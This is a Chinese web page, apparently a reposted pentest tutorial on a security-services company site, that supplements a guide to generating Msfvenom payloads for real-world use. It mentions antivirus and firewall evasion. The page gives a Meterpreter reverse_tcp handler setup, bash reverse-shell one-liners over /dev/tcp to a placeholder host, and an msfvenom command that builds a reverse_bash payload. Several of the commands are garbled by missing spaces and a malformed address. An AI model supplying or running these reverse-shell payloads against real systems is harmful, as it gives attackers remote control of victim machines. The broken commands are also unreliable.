基于Msfvenom 常用生成 Payload 命令的补充_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

基于Msfvenom 常用生成 Payload 命令的补充

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


基于Msfvenom 常用生成 Payload 命令的补充

在实战中可能会遇到各种诉求payload,并且可能遇到各种实际问题,如杀毒软件,防火墙拦截,特定端口通道,隧道等问题。这里我们根据第十课补充其中部分,其他内容后续补充。 这次主要补充了C#,Bashps 在线代码高亮:http://tool.oschina.net/highlight 1.C#-payload msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107 1.Bash-payload i >& /dev/tcp/xx.xx.xx.xx/xx0>&1 exec 5<>/dev/tcp/xx.xx.xx.xx/xx cat <&5| whileread line; do$line 2>&5>&5; done 附录: msfvenom 生成bash root@John:~# msfvenom -p cmd/unix/reverse_bash LHOST=xx.xx..xx.xx LPORT=xx > -f raw > payload.sh 参数简化 项目地址:https://github.com/g0tmi1k/mpc 文章来源:https://micropoor.blogspot.com

基于Msfvenom 常用生成 Payload 命令的补充